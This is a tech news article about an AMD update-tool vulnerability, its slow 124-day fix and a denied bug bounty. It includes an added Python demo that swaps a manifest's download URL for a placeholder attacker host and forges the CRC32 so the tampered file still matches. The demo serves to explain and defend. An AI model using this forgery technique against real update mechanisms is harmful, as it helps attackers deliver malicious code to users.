AMD has closed a software-update vulnerability after 124 days, but the researcher who found it says the company refused to pay a $10,000 bug bounty even though he followed the disclosure process and cooperated with the fix. The case is a tidy little example of how security programs can look generous on paper and stingy in practice.

The flaw was found in February inside AMD’s software update system. According to the researcher, Paul, an attacker positioned between the update tool and its download server could have tampered with what the tool fetched, turning a man-in-the-middle position into remote code execution on the user’s machine. AMD asked him to take down a blog post about the issue, promised a CVE, and said it would fix the software and credit him – but made clear from the start that payment was off the table because its bounty policy does not cover man-in-the-middle attacks.

Why the AMD software-update fix took 124 days

What slowed matters down was not the patch itself so much as the process around it. Paul says AMD first suggested a longer-than-standard embargo because the issue might affect tools beyond Ryzen Master, then later asked for more time again, citing multiple affected tools and customer requests to extend the deadline until after updates shipped. Standard disclosure windows are usually closer to 90 days, so the company’s timeline already looked stretched before the fix landed.

AMD ultimately pushed out an update on June 9. Paul says the new version now downloads drivers in a safer way, which is exactly the sort of boring sentence security teams love to write after a crisis. He also pointed out that file verification still relies on CRC32. That matters because CRC32 is a checksum designed to catch accidental corruption, not a cryptographic hash: it is a linear function of the input, so anyone who can alter a file can also adjust a handful of bytes to keep the checksum unchanged. A transport fix stops one attacker model; an integrity check that cannot be forged is what protects the file itself, and CRC32 is not one.
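To show why CRC32 is the wrong primitive for checking a downloaded update, the following Python is an added example written for this page; it is not code from the researcher, from AMD, or from the patched tool. It builds a toy update manifest (placeholder `.invalid` hostnames and a 4-byte slack field are assumptions, not anything from AMD’s format), lets a man-in-the-middle swap the download URL, and then rewrites the four slack bytes so the file’s CRC32 still equals the original’s. The same tampered file fails a SHA-256 comparison.

```python
import hashlib
import zlib


def forge_crc32(data: bytes, offset: int, target: int) -> bytes:
    """Rewrite the 4 bytes at data[offset:offset+4] so zlib.crc32(result) == target.

    CRC-32 is affine over GF(2): with everything but a 4-byte window fixed,
    crc(window = X) == crc(window = 0) XOR L(X), where L is linear in the 32
    bits of X. Build L from its 32 basis vectors, then solve L(X) == base XOR target.
    """
    if offset < 0 or offset + 4 > len(data):
        raise ValueError("need a 4-byte window inside the data")
    head, tail = data[:offset], data[offset + 4:]

    def crc_with(window: int) -> int:
        return zlib.crc32(head + window.to_bytes(4, "little") + tail)

    base = crc_with(0)
    # XOR basis indexed by leading bit: lead_delta[b] has its highest set bit
    # at position b, and lead_x[b] is the window value that produces it.
    lead_delta = [0] * 32
    lead_x = [0] * 32
    for bit in range(32):
        delta, x = crc_with(1 << bit) ^ base, 1 << bit
        for b in range(31, -1, -1):
            if not (delta >> b) & 1:
                continue
            if lead_delta[b] == 0:
                lead_delta[b], lead_x[b] = delta, x
                break
            delta ^= lead_delta[b]
            x ^= lead_x[b]

    # Express (base XOR target) as a combination of basis deltas; the
    # matching combination of window values is the patch we need.
    want, x = base ^ target, 0
    for b in range(31, -1, -1):
        if (want >> b) & 1:
            if lead_delta[b] == 0:  # cannot happen: the map is full rank for CRC-32
                raise ValueError("no 4-byte patch reaches the requested CRC")
            want ^= lead_delta[b]
            x ^= lead_x[b]
    return head + x.to_bytes(4, "little") + tail


def crc32_matches(data: bytes, expected: int) -> bool:
    return zlib.crc32(data) == expected


def sha256_matches(data: bytes, expected_hex: str) -> bool:
    return hashlib.sha256(data).hexdigest() == expected_hex


# Constructed sample: a tiny update manifest with a 4-byte slack field.
# Hostnames are placeholders (.invalid TLD), not AMD's real infrastructure.
ORIGINAL_MANIFEST = (
    b"name=chipset-driver\n"
    b"url=https://updates.example.invalid/driver.exe\n"
    b"slack=\x00\x00\x00\x00\n"
)
# What a man-in-the-middle would serve instead: same manifest, attacker's URL.
TAMPERED_MANIFEST = ORIGINAL_MANIFEST.replace(
    b"https://updates.example.invalid/driver.exe",
    b"http://attacker.invalid/evil.exe",
)


def run_demo() -> dict:
    """Tamper with the manifest, then repair its CRC-32 via the slack bytes."""
    original_crc = zlib.crc32(ORIGINAL_MANIFEST)
    original_sha = hashlib.sha256(ORIGINAL_MANIFEST).hexdigest()
    slack_at = TAMPERED_MANIFEST.index(b"slack=") + len(b"slack=")
    forged = forge_crc32(TAMPERED_MANIFEST, slack_at, original_crc)
    return {
        "crc32_accepts_forgery": crc32_matches(forged, original_crc),
        "sha256_accepts_forgery": sha256_matches(forged, original_sha),
        "malicious_url_survives": b"attacker.invalid/evil.exe" in forged,
    }


if __name__ == "__main__":
    for check, result in run_demo().items():
        print(f"{check}: {result}")
```

Because CRC32 is linear, any four bytes the consumer ignores (padding, a comment, trailing bytes a tolerant parser skips) are enough to hit an arbitrary checksum; the attacker never needs a collision search. Note the caveat that applies to the fix as well: a SHA-256 digest only helps if the expected value reaches the client over a path the attacker cannot rewrite, for example pinned in the installer or covered by a signature. A digest served from the same endpoint as the file is no better than CRC32 against a man-in-the-middle.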

The awkward part of the disclosure

There is a second layer to the story, and it is the kind vendors hate because it makes the whole thing look clumsy. One Reddit user claimed the vulnerable code path would not actually have been reachable, because the relevant fragment was never called in the first place. If that is correct, the download code AMD spent months remediating was effectively dead, and the tool could not update itself at all without manual installation – a neat illustration of how patch chains can fail in very ordinary ways.

That does not excuse the refusal to pay, of course. Big bug-bounty programs increasingly reward anything that touches authentication, update mechanisms, or code execution because the industry has learned the hard way that those are the attack paths worth paying for. AMD’s stance may fit the letter of its policy, but it does little for trust when the researcher did the work, the company got the fix, and the wallet stayed shut.

What researchers will notice next

The practical question now is whether AMD’s handling of this case discourages the kind of early reporting it needs most. Researchers talk to one another, and a reputation for denying edge-case claims can quickly become a reputation for making disclosure a chore. The patch is out, but the bigger lesson is simpler: if a vendor wants outsiders to keep finding holes in its software, it should not act surprised when they also ask to get paid.

Source: 3dnews
